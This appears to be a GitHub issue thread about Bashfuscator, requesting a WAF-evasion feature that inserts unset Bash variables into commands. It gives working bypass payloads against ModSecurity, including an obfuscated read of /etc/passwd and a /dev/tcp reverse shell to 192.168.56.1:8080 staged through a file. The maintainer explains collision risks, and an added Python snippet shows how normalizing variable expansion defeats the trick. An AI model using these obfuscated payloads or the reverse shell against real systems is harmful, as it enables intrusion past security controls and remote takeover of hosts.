I've tested this method and it bypassed mod security perfectly, so I think it will be wonderful if Bashfuscator can add this method.
Test case 1:
`ls -la` gets blocked by mod security
`ls$u -la` worked
Test case 2:
`cat /etc/passwd` gets blocked by mod security
`cat$u /etc$x/passwd$y` worked
Test case 3:
`/bin$u/bash$u -i >& /dev$u/tcp$u/192.168.56.1/8080 0>&1` doesn't get blocked but it can't create a connection (reverse shell), so I did it manually (using a pipeline may have been blocked by mod security because of the characters `|`, `;`, `&&`)
Step 1: `echo$x "/bin$u/bash$u -i >& /dev$u/tcp$u/192.168.56.1/8080 0>&1" > filename`
Step 2: `bash$a filename`
Bashfuscator already does this to a certain extent; the special variables `$@` and `$*` are liberally placed throughout obfuscated payloads. The reason only these variables are used is that they are special reserved variables in Bash, and due to the way Bashfuscator works, they will almost always be blank.
Generating randomly named variables and inserting them in Bash payloads is pretty risky... Bashfuscator can't know what variables will be already used in the environment in which payloads will be run, so there is a chance that payloads will fail in certain environments.
For instance, say that in the environment you're currently in, the variable $foo is initialized. Say also that you generate a payload with Bashfuscator, and using your uninitialized variable obfuscation method, it by chance inserts $foo into part of the payload. Because $foo is set, the payload will fail to execute. See the issue?
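The two points above (a signature that matches `ls -la` does not match `ls$u -la` because the WAF never expands the variable, and a payload built on a variable name that happens to be set in the target environment breaks) can both be shown with a small normalizer. The following is an added example written for this thread, not code from Bashfuscator or from the issue author; the signature list and the sample commands are constructed stand-ins, and the expansion logic is deliberately simplified (unbraced `$name` and `$@`/`$*` only, no `${name}`, positional parameters, or quoting rules). The defensive takeaway is that a rule engine which normalizes parameter expansions before matching closes this particular gap.

```python
import re

# Constructed signature list standing in for a WAF's command-injection rules
# (hypothetical; not ModSecurity's actual rule set).
SIGNATURES = [
    r"\bls\s+-la\b",
    r"\bcat\s+/etc/passwd\b",
]

# Matches an unbraced parameter expansion: '$' followed by a name, or $@ / $*.
VAR_REF = re.compile(r"\$([A-Za-z_][A-Za-z0-9_]*|[@*])")


def expand_vars(cmd, env):
    """Rewrite $name references the way the shell would before running cmd.

    Names absent from `env` expand to the empty string, which is exactly why
    'ls$u -la' executes as 'ls -la' when $u is unset.  Names that ARE set
    expand to their value and change the command, which is the collision
    risk with randomly generated variable names.
    """
    return VAR_REF.sub(lambda m: env.get(m.group(1), ""), cmd)


def matches_signature(cmd):
    """True if any constructed signature fires on the literal command text."""
    return any(re.search(sig, cmd) for sig in SIGNATURES)


def inspect(cmd, env=None):
    """Return (raw_hit, normalized_hit, expanded_cmd) for one command string.

    raw_hit is what a literal-string rule sees; normalized_hit is what the
    same rule sees after parameter expansion is applied first.
    """
    env = env or {}
    expanded = expand_vars(cmd, env)
    return matches_signature(cmd), matches_signature(expanded), expanded


if __name__ == "__main__":
    # Constructed inputs taken from the test cases in this issue.
    for cmd in ["ls -la", "ls$u -la", "cat /etc/passwd", "cat$u /etc$x/passwd$y"]:
        raw, norm, exp = inspect(cmd)
        print(f"{cmd!r:32} raw={raw!s:5} normalized={norm!s:5} -> {exp!r}")
    # The maintainer's collision case: $u is set in the environment.
    print(expand_vars("ls$u -la", {"u": "_foo"}))  # 'ls_foo -la', not 'ls -la'
```

Running it shows the literal rule missing every `$name`-laced variant while the normalized rule catches all of them, and the last line shows the same payload turning into a different command as soon as the chosen variable has a value.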
> Bashfuscator already does this to a certain extent; the special variables $@ and $* are liberally placed throughout obfuscated payloads.

I noticed this before I created the issue. But the current modules use a pipeline to execute the command, so it can't bypass a WAF (mod security for example). So is there any chance to run the command without a pipeline (like adding an option `--no-pipeline`?). IMO, creating an obfuscated payload that can bypass a WAF is the thing that everybody needs :D

> Generating randomly named variables and inserting them in Bash payloads is pretty risky...
Source:
https://www.secjuice.com/web-application-firewall-waf-evasion/